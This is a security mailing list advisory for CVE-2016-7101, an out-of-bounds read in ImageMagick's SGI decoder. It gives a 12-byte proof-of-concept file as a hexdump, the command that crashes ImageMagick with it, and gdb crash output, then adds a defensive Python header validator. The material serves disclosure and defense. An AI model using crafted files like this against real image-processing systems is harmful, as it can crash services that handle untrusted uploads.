
List:       oss-security
Subject:    [oss-security] CVE-2016-7101 - ImageMagick SGI Coder Out-Of-Bounds Read Vulnerability
From:       <pwchen () tencent ! com>
Date:       2016-09-26 7:54:24
Message-ID: 2A704EDCB5C64F40AF988060A961492BBB3B0E () EXMBX-TJ007 ! tencent ! com

Hi.

This is Peiwen Chen of Tencent's Xuanwu Lab & Ray Zhong of Tencent's Keen Lab.
During our research, we found an Out-Of-Bounds write vulnerability in
ImageMagick's SGI coder.

When ImageMagick is identifying an SGI format image, we can craft an SGI file
with a big value of row. It will read a certain number of times, which is
controllable by the value of row, and this causes an Out-Of-Bounds Read.

The ImageMagick team has fixed the vulnerability we reported.


Upstream fix:
https://github.com/ImageMagick/ImageMagick/commit/7afcf9f71043df15508e46f079387bd4689a738d
https://github.com/ImageMagick/ImageMagick/commit/8f8959033e4e59418d6506b345829af1f7a71127

Debian Bug report:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=836776


Attached is a proof of concept and backtrace.

$ hexdump PoC.sgi
0000000 da01 0100 0000 fffe 0200 0400
000000c

$ convert PoC.sgi


Program received signal SIGSEGV, Segmentation fault.
[------------------------registers------------------------]
RAX: 0x0
RBX: 0x1
RCX: 0xf939
RDX: 0x6031b0 --> 0x0
RSI: 0x7ffff7fe8090 --> 0x1
RDI: 0x7ffff7dcef98 --> 0x1
RBP: 0xdfbc
RSP: 0x7fffffff5e60 --> 0xffffffff54535254
RIP: 0x7ffff74eae8b (<IdentifyImageGray+795>: movss  xmm0,DWORD PTR [r15+rax*4])
R8 : 0x744850 --> 0x0
R9 : 0x1
R10: 0x69a000 --> 0x0
R11: 0x1
R12: 0x641600 --> 0x600000000
R13: 0x6535f0 --> 0x1700000001
R14: 0x603178 --> 0x6031b0 --> 0x0

R15: 0x765000                          <== end address of heap

[---------------------------code---------------------------]
   0x7ffff74eae7d <IdentifyImageGray+781>: inc    BYTE PTR [rdx+rcx*1]
   0x7ffff74eae80 <IdentifyImageGray+784>: mov    DWORD PTR [rax],0x5177
   0x7ffff74eae86 <IdentifyImageGray+790>: mov    rax,QWORD PTR [rsp+0x30]
=> 0x7ffff74eae8b <IdentifyImageGray+795>: movss  xmm0,DWORD PTR [r15+rax*4]
   0x7ffff74eae91 <IdentifyImageGray+801>: movaps XMMWORD PTR [rsp+0x40],xmm0
   0x7ffff74eae96 <IdentifyImageGray+806>: mov    rax,QWORD PTR [rsp+0x28]
   0x7ffff74eae9b <IdentifyImageGray+811>: movss  xmm4,DWORD PTR [r15+rax*4]
   0x7ffff74eaea1 <IdentifyImageGray+817>: subss  xmm0,xmm4
[---------------------------stack---------------------------]
00:0000| rsp 0x7fffffff5e60 --> 0xffffffff54535254
01:0008|     0x7fffffff5e68 --> 0x0
02:0016|     0x7fffffff5e70 --> 0x63d600 --> 0x6535f0 --> 0x1700000001
03:0024|     0x7fffffff5e78 --> 0x614160 --> 0x1a9
04:0032|     0x7fffffff5e80 --> 0x0
05:0040|     0x7fffffff5e88 --> 0x1
06:0048|     0x7fffffff5e90 --> 0x0
07:0056|     0x7fffffff5e98 --> 0xfeff
[-----------------------------------------------------------]
Legend: stack, code, data, heap, rodata, value
Stopped reason: SIGSEGV
0x00007ffff74eae8b in IsPixelMonochrome (image=<optimized out>, pixel=<optimized out>) at ./MagickCore/pixel-accessor.h:561
561   red_green=(MagickRealType) pixel[image->channel_map[RedPixelChannel].offset]-

gdb-peda$ bt
#0  0x00007ffff74eae8b in IsPixelMonochrome (image=<optimized out>, pixel=<optimized out>) at ./MagickCore/pixel-accessor.h:561
#1  IdentifyImageGray (image=<optimized out>, exception=<optimized out>) at MagickCore/attribute.c:683
#2  0x00007ffff74ebb7a in IdentifyImageType (image=0x6535f0, exception=0x614160) at MagickCore/attribute.c:821
#3  0x00007ffff7647d39 in IdentifyImage (image=0x6535f0, file=<optimized out>, verbose=<optimized out>, exception=0x614160) at MagickCore/identify.c:494
#4  0x00007ffff71024a6 in IdentifyImageCommand (image_info=<optimized out>, argc=<optimized out>, argv=<optimized out>, metadata=<optimized out>, exception=<optimized out>) at MagickWand/identify.c:336
#5  0x00007ffff7153e53 in MagickCommandGenesis (image_info=<optimized out>, command=<optimized out>, argc=<optimized out>, argv=<optimized out>, metadata=<optimized out>, exception=<optimized out>) at MagickWand/mogrify.c:183
#6  0x0000000000401cae in MagickMain (argc=<optimized out>, argv=<optimized out>) at utilities/magick.c:145
#7  main (argc=<optimized out>, argv=<optimized out>, argv@entry=0x7fffffffeb48) at utilities/magick.c:176
#8  0x00007ffff5a3b830 in __libc_start_main (main=0x4015f0 <main>, argc=0x2, argv=0x7fffffffeb48, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffeb38) at ../csu/libc-start.c:291
#9  0x0000000000401519 in _start ()


gdb-peda$ vmmap
Start              End                Perm Name
0x00400000         0x00403000         r-xp /usr/local/bin/magick
0x00602000         0x00603000         r--p /usr/local/bin/magick
0x00603000         0x00604000         rw-p /usr/local/bin/magick
0x00604000         0x00765000         rw-p [heap]
0x00007ffff553f000 0x00007ffff5817000 r--p /usr/lib/locale/locale-archive


Regards,
Peiwen Chen
Tencent's Xuanwu Lab
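
As an added example (not part of the advisory and not ImageMagick's own code), a Python sanity check that a file gate or triage script can apply to an SGI file before it reaches a decoder: it parses the standard SGI header layout (magic, storage, bytes per channel, dimension, xsize, ysize, zsize, all big-endian) and rejects files whose declared geometry cannot be backed by the bytes actually present. The PoC bytes are reconstructed from the hexdump above, which prints 16-bit little-endian words; the geometry-versus-length rule is a generic consistency check, not the upstream fix.

```python
import struct

# Constructed from the advisory's hexdump of PoC.sgi. hexdump prints 16-bit
# little-endian words, so "da01 0100 0000 fffe 0200 0400" is this byte string.
POC_SGI = bytes.fromhex("01da00010000feff00020004")

SGI_HEADER_LEN = 512       # the SGI format's fixed header size
SGI_MAGIC = 0x01DA
SGI_STORAGE_VERBATIM = 0   # uncompressed pixel rows follow the header
SGI_STORAGE_RLE = 1        # 4-byte start/length tables per row follow the header


def parse_sgi_header(data):
    """Decode the first 12 header bytes; all multi-byte fields are big-endian."""
    if len(data) < 12:
        raise ValueError("too short to hold an SGI header prefix")
    magic, storage, bpc, dim, xsize, ysize, zsize = struct.unpack(">HBBHHHH", data[:12])
    if magic != SGI_MAGIC:
        raise ValueError("not an SGI image: bad magic 0x%04x" % magic)
    return {"storage": storage, "bpc": bpc, "dimension": dim,
            "xsize": xsize, "ysize": ysize, "zsize": zsize}


def check_sgi(data):
    """Return reasons to reject the file; an empty list means the declared
    geometry is consistent with the bytes present."""
    hdr = parse_sgi_header(data)
    findings = []
    if len(data) < SGI_HEADER_LEN:
        findings.append("truncated: %d bytes, header alone is %d" % (len(data), SGI_HEADER_LEN))
    if hdr["bpc"] not in (1, 2):
        findings.append("bytes per channel must be 1 or 2, got %d" % hdr["bpc"])
    if hdr["storage"] not in (SGI_STORAGE_VERBATIM, SGI_STORAGE_RLE):
        findings.append("unknown storage type %d" % hdr["storage"])
    if 0 in (hdr["xsize"], hdr["ysize"], hdr["zsize"]):
        findings.append("zero-sized dimension")
    body = max(0, len(data) - SGI_HEADER_LEN)
    rows = hdr["ysize"] * hdr["zsize"]            # one row per scanline per channel
    if hdr["storage"] == SGI_STORAGE_VERBATIM:
        need = hdr["xsize"] * rows * hdr["bpc"]   # every pixel stored in full
    else:
        need = 2 * 4 * rows                       # start and length entry per row
    if body < need:
        findings.append("geometry %dx%dx%d needs at least %d body bytes, only %d present"
                        % (hdr["xsize"], hdr["ysize"], hdr["zsize"], need, body))
    return findings


def is_sane_sgi(data):
    return check_sgi(data) == []
```

Run against the PoC, `check_sgi` reports both the truncated header and the impossible row count; a decoder that trusts the header fields alone would size its reads from them.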


